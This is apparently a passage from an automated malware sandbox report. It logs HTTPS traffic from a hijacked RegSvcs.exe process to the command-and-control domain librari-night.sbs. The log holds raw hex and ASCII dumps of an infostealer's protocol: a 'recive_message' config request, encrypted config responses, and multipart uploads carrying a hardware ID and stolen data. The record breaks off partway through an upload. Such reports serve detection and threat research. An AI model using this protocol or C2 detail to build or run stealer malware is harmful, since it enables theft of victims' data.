                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1750599&cwnd=243&unsent_bytes=0&cid=54ee9e4d0fd619dc&ts=746&x=0"
                                                                                                                                      2024-11-22 04:02:08 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                      Data Ascii: 2ok
                                                                                                                                      2024-11-22 04:02:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.549708172.67.206.1724431248C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-22 04:02:10 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 46
                                                                                                                                      Host: librari-night.sbs
                                                                                                                                      2024-11-22 04:02:10 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 63 39 42 6e 38 2d 2d 74 65 73 74 26 6a 3d
                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=Fc9Bn8--test&j=
                                                                                                                                      2024-11-22 04:02:11 UTC1017INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 22 Nov 2024 04:02:10 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=ptdk7s3noa5d51mhgj1vrahon1; expires=Mon, 17-Mar-2025 21:48:49 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZTWRj%2FtQVNLNlVkwF5Ap6V%2F8DCeQ0Re6BCQ7aHsm20m8txXvqUTI8Qh8MLTPu9BZ0jcN%2Fkcz7FQBjEbBRTqz0NgNbt5pVGnrK95Dr%2FWC57RQME3CxpDC5p9eDc6XlEkCOErHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8e6605bf5e37c411-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=947&delivery_rate=1775075&cwnd=214&unsent_bytes=0&cid=85cbe954ba85d1d8&ts=745&x=0"
                                                                                                                                      2024-11-22 04:02:11 UTC352INData Raw: 63 63 35 0d 0a 49 33 32 78 70 42 44 69 74 4b 51 47 32 49 4a 36 32 78 6f 4b 43 44 66 4a 6e 57 75 36 30 48 59 41 36 37 66 46 70 64 6e 52 4a 51 4e 59 58 38 65 47 4b 74 61 59 68 6e 57 39 6f 45 43 76 61 48 39 74 47 2b 76 38 44 35 6a 71 45 47 47 48 78 4b 43 4a 2b 36 64 49 49 52 6b 62 30 4d 68 6a 68 35 69 47 59 36 43 67 51 49 42 68 4b 47 31 5a 36 36 64 4a 33 37 6f 55 59 59 66 56 70 4d 36 32 6f 55 6c 67 53 78 48 57 7a 48 57 42 30 4d 56 71 74 65 63 66 76 6e 74 67 5a 6c 36 6b 39 51 61 59 2f 46 52 6c 6b 5a 58 2f 68 35 53 30 55 57 4a 75 48 4d 4c 50 4d 70 2b 59 33 79 53 39 37 46 6a 68 4f 47 74 74 56 61 58 37 44 39 47 34 48 6d 69 50 31 4b 48 50 71 62 68 44 61 30 73 66 31 63 31 2f 69 4d 54 49 59 4c 4c 73 47 62 52 37 4b 43 51 56 72 4f 64 4a 67 50 4a 48 55 49 72 45 74 74
                                                                                                                                      Data Ascii: cc5I32xpBDitKQG2IJ62xoKCDfJnWu60HYA67fFpdnRJQNYX8eGKtaYhnW9oECvaH9tG+v8D5jqEGGHxKCJ+6dIIRkb0Mhjh5iGY6CgQIBhKG1Z66dJ37oUYYfVpM62oUlgSxHWzHWB0MVqtecfvntgZl6k9QaY/FRlkZX/h5S0UWJuHMLPMp+Y3yS97FjhOGttVaX7D9G4HmiP1KHPqbhDa0sf1c1/iMTIYLLsGbR7KCQVrOdJgPJHUIrEtt
                                                                                                                                      2024-11-22 04:02:11 UTC1369INData Raw: 7a 6a 64 62 55 62 4c 48 72 48 61 74 7a 59 57 64 59 71 2f 49 44 31 37 45 55 5a 59 50 66 71 4d 32 2f 76 6b 70 6e 51 52 2b 54 69 44 4b 48 7a 6f 59 38 2b 73 4d 64 71 58 39 6b 66 42 65 52 76 78 61 57 71 31 52 6c 68 5a 58 2f 68 37 4f 32 52 47 4a 4b 45 4e 44 4f 65 5a 4c 57 31 47 4b 33 35 51 71 2f 66 57 5a 67 56 72 6e 31 42 39 36 78 48 57 6d 41 30 4b 44 44 2b 2f 30 48 5a 6c 6c 66 69 34 5a 54 6a 64 33 4b 62 71 33 67 57 4b 59 32 63 53 70 53 70 37 39 52 6d 4c 59 56 5a 6f 6a 52 71 63 6d 2f 76 30 46 76 54 42 44 56 7a 48 4b 48 33 4d 35 73 75 2b 30 54 74 6e 68 74 5a 31 47 74 38 77 6a 64 38 6c 6f 69 6a 73 33 6e 6e 2f 75 64 51 47 4a 54 58 65 62 46 66 49 37 52 30 43 53 6c 72 67 48 35 66 32 51 71 44 65 76 78 44 4e 65 67 46 58 43 4d 32 37 58 4c 76 72 56 4b 59 6b 38 66 31 73
                                                                                                                                      Data Ascii: zjdbUbLHrHatzYWdYq/ID17EUZYPfqM2/vkpnQR+TiDKHzoY8+sMdqX9kfBeRvxaWq1RlhZX/h7O2RGJKENDOeZLW1GK35Qq/fWZgVrn1B96xHWmA0KDD+/0HZllfi4ZTjd3Kbq3gWKY2cSpSp79RmLYVZojRqcm/v0FvTBDVzHKH3M5su+0TtnhtZ1Gt8wjd8loijs3nn/udQGJTXebFfI7R0CSlrgH5f2QqDevxDNegFXCM27XLvrVKYk8f1s
                                                                                                                                      2024-11-22 04:02:11 UTC1369INData Raw: 30 43 53 6c 72 67 48 35 66 32 51 71 44 65 76 7a 41 4e 69 35 48 6d 61 4a 30 71 72 43 75 4c 52 45 62 45 59 56 33 63 46 32 6a 4e 2f 4c 59 72 72 6e 48 4c 78 71 62 57 4e 5a 70 37 39 48 6d 4c 55 4d 49 74 47 56 69 4d 43 74 73 47 68 69 55 42 61 54 32 54 79 5a 6c 73 46 6f 2b 72 68 59 76 6e 31 67 59 56 4f 6a 2f 78 76 64 76 42 39 6a 67 39 4f 6d 79 72 65 31 52 32 42 42 47 64 2f 47 64 59 66 45 31 47 47 38 38 68 4c 35 4e 69 68 74 54 65 75 6e 53 65 36 69 41 33 4f 66 6c 35 4c 45 74 62 31 41 64 77 45 41 6e 64 38 79 68 39 71 47 50 50 72 72 47 4c 56 2f 59 47 78 52 6f 2f 41 47 30 61 41 56 62 6f 66 48 6f 4d 65 79 76 55 68 74 53 42 4c 55 79 33 6d 4b 32 38 4a 6a 75 36 42 57 2b 58 39 77 4b 67 33 72 79 52 6e 56 76 6a 70 70 68 64 7a 6e 32 50 57 71 42 32 5a 4e 58 34 75 47 64 6f 7a
                                                                                                                                      Data Ascii: 0CSlrgH5f2QqDevzANi5HmaJ0qrCuLREbEYV3cF2jN/LYrrnHLxqbWNZp79HmLUMItGViMCtsGhiUBaT2TyZlsFo+rhYvn1gYVOj/xvdvB9jg9Omyre1R2BBGd/GdYfE1GG88hL5NihtTeunSe6iA3Ofl5LEtb1AdwEAnd8yh9qGPPrrGLV/YGxRo/AG0aAVbofHoMeyvUhtSBLUy3mK28Jju6BW+X9wKg3ryRnVvjpphdzn2PWqB2ZNX4uGdoz
                                                                                                                                      2024-11-22 04:02:11 UTC186INData Raw: 75 55 64 76 58 39 73 62 46 72 72 73 55 6e 66 71 6c 51 36 79 66 71 41 38 76 6d 53 66 53 46 65 55 63 71 47 64 59 79 57 6e 69 53 32 34 78 53 78 64 32 35 6a 57 61 48 32 41 74 53 35 45 47 36 41 30 4b 48 47 76 72 5a 47 5a 55 30 56 31 63 56 78 6a 39 6e 4a 62 50 71 75 57 4c 35 67 4b 44 49 56 6a 75 67 43 31 72 52 55 66 63 66 4d 35 38 43 33 38 78 38 68 54 52 62 56 77 48 65 4d 31 38 42 73 76 2b 67 63 75 48 35 75 61 56 71 76 2b 67 6a 58 74 68 68 73 67 39 53 6d 79 37 43 38 54 47 51 42 55 5a 50 42 61 73 43 4f 68 6c 57 35 39 67 2b 70 64 43 68 31 47 37 4b 2f 44 0d 0a
                                                                                                                                      Data Ascii: uUdvX9sbFrrsUnfqlQ6yfqA8vmSfSFeUcqGdYyWniS24xSxd25jWaH2AtS5EG6A0KHGvrZGZU0V1cVxj9nJbPquWL5gKDIVjugC1rRUfcfM58C38x8hTRbVwHeM18Bsv+gcuH5uaVqv+gjXthhsg9Smy7C8TGQBUZPBasCOhlW59g+pdCh1G7K/D
                                                                                                                                      2024-11-22 04:02:11 UTC1369INData Raw: 33 37 61 37 0d 0a 74 54 79 54 43 4b 49 78 36 33 4e 74 62 5a 49 5a 45 49 51 31 4d 74 30 6a 4e 7a 50 62 4c 7a 76 45 61 74 37 5a 47 52 53 70 66 4d 48 31 62 67 58 62 38 6d 62 35 38 43 6a 38 78 38 68 62 52 6a 65 36 48 6d 4d 30 59 5a 37 39 50 6c 59 76 6e 51 6f 4d 68 57 6e 39 51 58 52 73 68 31 6e 67 64 36 75 77 72 71 34 51 6d 4a 48 45 74 7a 50 59 49 72 56 79 47 65 32 37 42 36 34 65 33 70 69 58 4f 75 78 53 64 2b 71 56 44 72 4a 39 4b 6e 4b 72 37 52 58 49 56 35 52 79 6f 5a 31 6a 4a 61 65 4a 4c 6e 68 46 37 70 35 5a 57 78 63 6f 2f 38 50 33 62 30 5a 62 49 37 53 70 38 71 31 76 45 46 70 54 42 50 59 79 48 75 47 31 73 64 75 2b 71 35 59 76 6d 41 6f 4d 68 57 62 2f 41 6e 59 71 56 52 39 78 38 7a 6e 77 4c 66 7a 48 79 46 54 46 64 72 47 63 59 2f 52 77 6d 2b 32 35 52 32 32 65 32
                                                                                                                                      Data Ascii: 37a7tTyTCKIx63NtbZIZEIQ1Mt0jNzPbLzvEat7ZGRSpfMH1bgXb8mb58Cj8x8hbRje6HmM0YZ79PlYvnQoMhWn9QXRsh1ngd6uwrq4QmJHEtzPYIrVyGe27B64e3piXOuxSd+qVDrJ9KnKr7RXIV5RyoZ1jJaeJLnhF7p5ZWxco/8P3b0ZbI7Sp8q1vEFpTBPYyHuG1sdu+q5YvmAoMhWb/AnYqVR9x8znwLfzHyFTFdrGcY/Rwm+25R22e2
                                                                                                                                      2024-11-22 04:02:11 UTC1369INData Raw: 35 6b 6e 66 76 6c 51 36 79 64 53 72 79 4c 69 38 52 47 4a 41 46 63 48 55 66 6f 6e 65 77 32 69 78 37 68 36 72 66 6d 64 6a 56 71 6a 32 44 74 43 2b 48 6d 47 4f 6c 65 6d 48 76 4b 73 48 4f 51 45 38 78 4e 5a 2f 77 4d 6d 49 66 66 72 6e 46 50 6b 67 4b 47 4a 59 6f 2f 55 4e 33 37 38 54 5a 49 44 48 72 73 4b 31 73 30 4e 71 54 68 6e 58 78 58 4b 53 30 4d 4a 73 75 65 30 56 74 33 74 73 4b 68 76 72 2b 42 47 59 36 6c 52 51 68 4e 75 38 79 4c 79 69 54 53 46 65 55 63 71 47 64 59 79 57 6e 69 53 2b 37 67 71 79 65 57 4e 68 57 36 7a 77 44 4e 4b 79 47 32 61 4b 32 36 7a 47 75 4c 74 4b 62 45 38 56 32 73 39 31 6a 4e 4c 42 4a 50 53 67 48 36 45 34 4d 43 70 2b 69 74 49 6c 33 36 68 55 66 63 66 4d 35 38 43 33 38 78 38 68 54 52 62 66 7a 48 6d 48 33 4d 68 74 74 4f 73 4b 71 33 74 73 61 56 79
                                                                                                                                      Data Ascii: 5knfvlQ6ydSryLi8RGJAFcHUfonew2ix7h6rfmdjVqj2DtC+HmGOlemHvKsHOQE8xNZ/wMmIffrnFPkgKGJYo/UN378TZIDHrsK1s0NqThnXxXKS0MJsue0Vt3tsKhvr+BGY6lRQhNu8yLyiTSFeUcqGdYyWniS+7gqyeWNhW6zwDNKyG2aK26zGuLtKbE8V2s91jNLBJPSgH6E4MCp+itIl36hUfcfM58C38x8hTRbfzHmH3MhttOsKq3tsaVy
                                                                                                                                      2024-11-22 04:02:11 UTC1369INData Raw: 62 51 58 5a 73 6d 62 35 38 43 6a 38 78 38 68 62 42 50 55 37 33 57 62 6c 74 6b 71 6f 36 41 66 74 54 67 77 4b 6c 53 67 39 51 62 56 73 52 4a 68 67 74 43 74 78 72 79 37 53 6e 4e 43 45 4e 7a 43 63 6f 2f 51 77 47 57 31 35 68 2b 77 65 57 42 74 46 65 57 2f 44 73 44 79 54 43 4b 6e 30 71 54 44 2b 36 77 4a 65 41 45 59 33 34 59 71 77 4e 62 4d 62 72 44 75 47 4c 35 71 62 6d 4e 56 71 4f 30 4b 33 72 6f 53 62 6f 58 59 72 38 36 37 74 6b 78 73 53 68 4c 56 78 6e 6d 42 6c 6f 67 6b 76 66 68 59 34 54 68 5a 5a 31 75 76 38 51 72 49 74 56 52 39 78 38 7a 6e 77 4c 66 7a 48 79 46 4f 46 73 48 42 64 34 6a 66 78 6d 71 7a 36 52 2b 39 65 32 6c 75 57 61 54 32 43 74 43 7a 48 47 32 4b 31 61 7a 50 73 62 4a 4a 5a 41 46 52 6b 38 46 71 77 49 36 47 53 37 6e 6c 45 37 67 36 54 32 78 53 70 37 38 57
                                                                                                                                      Data Ascii: bQXZsmb58Cj8x8hbBPU73Wbltkqo6AftTgwKlSg9QbVsRJhgtCtxry7SnNCENzCco/QwGW15h+weWBtFeW/DsDyTCKn0qTD+6wJeAEY34YqwNbMbrDuGL5qbmNVqO0K3roSboXYr867tkxsShLVxnmBlogkvfhY4ThZZ1uv8QrItVR9x8znwLfzHyFOFsHBd4jfxmqz6R+9e2luWaT2CtCzHG2K1azPsbJJZAFRk8FqwI6GS7nlE7g6T2xSp78W
                                                                                                                                      2024-11-22 04:02:11 UTC1369INData Raw: 4b 38 31 71 6e 4a 76 4b 56 57 4c 47 59 46 33 73 42 6c 6b 5a 61 49 4a 4c 79 67 51 4f 6b 32 4b 47 35 45 36 36 64 5a 69 75 6c 42 4d 64 36 46 39 64 6a 31 71 67 64 33 41 55 65 42 69 44 4b 53 6c 70 34 6b 2f 65 4d 4b 71 33 35 72 66 46 62 73 77 54 66 32 74 52 4a 6e 6a 73 58 6c 36 62 43 6e 51 43 45 50 58 39 79 47 4b 72 6d 57 6a 69 53 46 72 6c 69 68 4f 44 41 71 59 4b 6a 78 42 39 2b 6b 42 53 2b 6e 30 71 48 43 76 4b 4d 46 54 30 6f 4c 31 49 59 38 77 4e 43 47 50 4f 71 75 57 4c 31 70 4b 44 49 46 2b 61 52 63 69 2b 56 45 4d 4a 61 62 76 6f 65 74 38 78 38 7a 44 31 2f 42 68 69 72 41 6b 63 56 32 71 4f 59 62 72 33 73 76 56 47 75 6f 36 51 54 58 75 52 56 63 74 2f 75 71 78 72 69 39 42 56 42 58 45 73 50 46 64 34 66 6f 2b 47 71 39 39 42 2b 33 66 6d 67 71 47 2b 76 77 53 59 43 4c 56
                                                                                                                                      Data Ascii: K81qnJvKVWLGYF3sBlkZaIJLygQOk2KG5E66dZiulBMd6F9dj1qgd3AUeBiDKSlp4k/eMKq35rfFbswTf2tRJnjsXl6bCnQCEPX9yGKrmWjiSFrlihODAqYKjxB9+kBS+n0qHCvKMFT0oL1IY8wNCGPOquWL1pKDIF+aRci+VEMJabvoet8x8zD1/BhirAkcV2qOYbr3svVGuo6QTXuRVct/uqxri9BVBXEsPFd4fo+Gq99B+3fmgqG+vwSYCLV
                                                                                                                                      2024-11-22 04:02:11 UTC1369INData Raw: 6e 6e 2b 76 68 48 44 51 53 53 49 4f 55 62 63 37 50 68 6e 4c 36 75 45 72 33 4f 48 6f 71 44 65 75 34 43 73 71 67 45 6d 47 66 31 75 44 35 68 5a 52 4a 5a 6b 41 4a 77 38 74 2b 6f 64 58 58 62 6f 54 65 44 62 70 32 5a 6d 31 44 75 72 39 48 6d 4c 31 55 4f 72 43 56 37 34 65 45 2f 51 64 35 41 55 65 54 38 33 47 4f 32 4d 46 79 71 36 30 2f 74 33 39 70 66 45 57 6d 38 79 6a 62 6f 78 34 69 78 35 57 68 68 2b 50 68 43 53 46 46 44 70 4f 65 49 74 4b 4e 6b 7a 66 74 73 45 71 6d 4e 6e 45 71 51 2b 75 6e 57 35 62 79 42 69 4c 52 6c 65 44 45 71 61 46 42 59 6c 63 63 6c 50 68 4d 70 63 48 46 64 4c 7a 6a 4a 6f 64 54 5a 47 78 53 73 66 67 50 2f 70 4a 55 4c 4d 6e 61 35 35 2b 43 38 77 38 68 66 6c 47 54 33 6a 4c 59 6c 76 4e 6e 74 4f 34 66 72 32 6b 6c 54 30 4b 6f 37 77 2f 62 38 6c 6f 69 6a 35
                                                                                                                                      Data Ascii: nn+vhHDQSSIOUbc7PhnL6uEr3OHoqDeu4CsqgEmGf1uD5hZRJZkAJw8t+odXXboTeDbp2Zm1Dur9HmL1UOrCV74eE/Qd5AUeT83GO2MFyq60/t39pfEWm8yjbox4ix5Whh+PhCSFFDpOeItKNkzftsEqmNnEqQ+unW5byBiLRleDEqaFBYlcclPhMpcHFdLzjJodTZGxSsfgP/pJULMna55+C8w8hflGT3jLYlvNntO4fr2klT0Ko7w/b8loij5


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.549709172.67.206.1724431248C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-22 04:02:12 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=V31ZB5AUZ1ZALSPCTT
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 12834
                                                                                                                                      Host: librari-night.sbs
                                                                                                                                      2024-11-22 04:02:12 UTC12834OUTData Raw: 2d 2d 56 33 31 5a 42 35 41 55 5a 31 5a 41 4c 53 50 43 54 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 41 30 34 33 37 36 35 39 38 36 36 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 56 33 31 5a 42 35 41 55 5a 31 5a 41 4c 53 50 43 54 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 33 31 5a 42 35 41 55 5a 31 5a 41 4c 53 50 43 54 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 63 39 42 6e 38 2d 2d 74 65 73 74 0d
                                                                                                                                      Data Ascii: --V31ZB5AUZ1ZALSPCTTContent-Disposition: form-data; name="hwid"BA8A0437659866CB63CFCF7E6C45F838--V31ZB5AUZ1ZALSPCTTContent-Disposition: form-data; name="pid"2--V31ZB5AUZ1ZALSPCTTContent-Disposition: form-data; name="lid"Fc9Bn8--test
                                                                                                                                      2024-11-22 04:02:13 UTC1026INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 22 Nov 2024 04:02:13 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=och8avr7qsngqp7arh0ef0bob5; expires=Mon, 17-Mar-2025 21:48:52 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KI7WxBDqehBtmxshsFu9X%2BQSDk4U%2FeO7VXyXSH%2BEgp%2B%2BXbWF4VSQ6nrwsXGnwFg51911eZvX%2Fy60CGzgzbgcywEhMzA8GLDLT%2FGkGuvaJAtCW8Brjx7Jdek3rfsNJ8ucfpHXQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8e6605cd3bdc4289-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1731&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13775&delivery_rate=1680092&cwnd=145&unsent_bytes=0&cid=59c37ff9432d23df&ts=801&x=0"
                                                                                                                                      2024-11-22 04:02:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                      Data Ascii: eok 8.46.123.75
                                                                                                                                      2024-11-22 04:02:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.549710172.67.206.1724431248C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-22 04:02:14 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=POBUP2MJIL1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 15034
                                                                                                                                      Host: librari-night.sbs
                                                                                                                                      2024-11-22 04:02:14 UTC15034OUTData Raw: 2d 2d 50 4f 42 55 50 32 4d 4a 49 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 41 30 34 33 37 36 35 39 38 36 36 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 50 4f 42 55 50 32 4d 4a 49 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4f 42 55 50 32 4d 4a 49 4c 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 63 39 42 6e 38 2d 2d 74 65 73 74 0d 0a 2d 2d 50 4f 42 55 50 32 4d 4a 49 4c 31 0d 0a 43 6f 6e 74 65
                                                                                                                                      Data Ascii: --POBUP2MJIL1Content-Disposition: form-data; name="hwid"BA8A0437659866CB63CFCF7E6C45F838--POBUP2MJIL1Content-Disposition: form-data; name="pid"2--POBUP2MJIL1Content-Disposition: form-data; name="lid"Fc9Bn8--test--POBUP2MJIL1Conte
                                                                                                                                      2024-11-22 04:02:15 UTC1017INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 22 Nov 2024 04:02:15 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=p26fn8ku5o8ilg6j93t9ajgl1l; expires=Mon, 17-Mar-2025 21:48:54 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AL2kc3LC55Cu7wPsMMG%2FX2BOJBgObauSIUkYF0vzEkY1ivbVgsB%2FYUps6GcqD4CJZ73tNuJIcRzuSdhE8zAVZ2eG0Prhiou969Qq4vQDETIaCLnDurFBbZBFsEW96j4d7gxsWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8e6605db0e8c8cec-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=10064&sent=12&recv=19&lost=0&retrans=0&sent_bytes=2844&recv_bytes=15968&delivery_rate=181355&cwnd=199&unsent_bytes=0&cid=6d8c1331fedfacd5&ts=821&x=0"
                                                                                                                                      2024-11-22 04:02:15 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                      Data Ascii: eok 8.46.123.75
                                                                                                                                      2024-11-22 04:02:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.549712172.67.206.1724431248C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-22 04:02:16 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=U4WC6T04TDNKP3M5UHA
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 20572
                                                                                                                                      Host: librari-night.sbs
                                                                                                                                      2024-11-22 04:02:16 UTC15331OUTData Raw: 2d 2d 55 34 57 43 36 54 30 34 54 44 4e 4b 50 33 4d 35 55 48 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 38 41 30 34 33 37 36 35 39 38 36 36 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 55 34 57 43 36 54 30 34 54 44 4e 4b 50 33 4d 35 55 48 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 34 57 43 36 54 30 34 54 44 4e 4b 50 33 4d 35 55 48 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 63 39 42 6e 38 2d 2d 74 65
                                                                                                                                      Data Ascii: --U4WC6T04TDNKP3M5UHAContent-Disposition: form-data; name="hwid"BA8A0437659866CB63CFCF7E6C45F838--U4WC6T04TDNKP3M5UHAContent-Disposition: form-data; name="pid"3--U4WC6T04TDNKP3M5UHAContent-Disposition: form-data; name="lid"Fc9Bn8--te
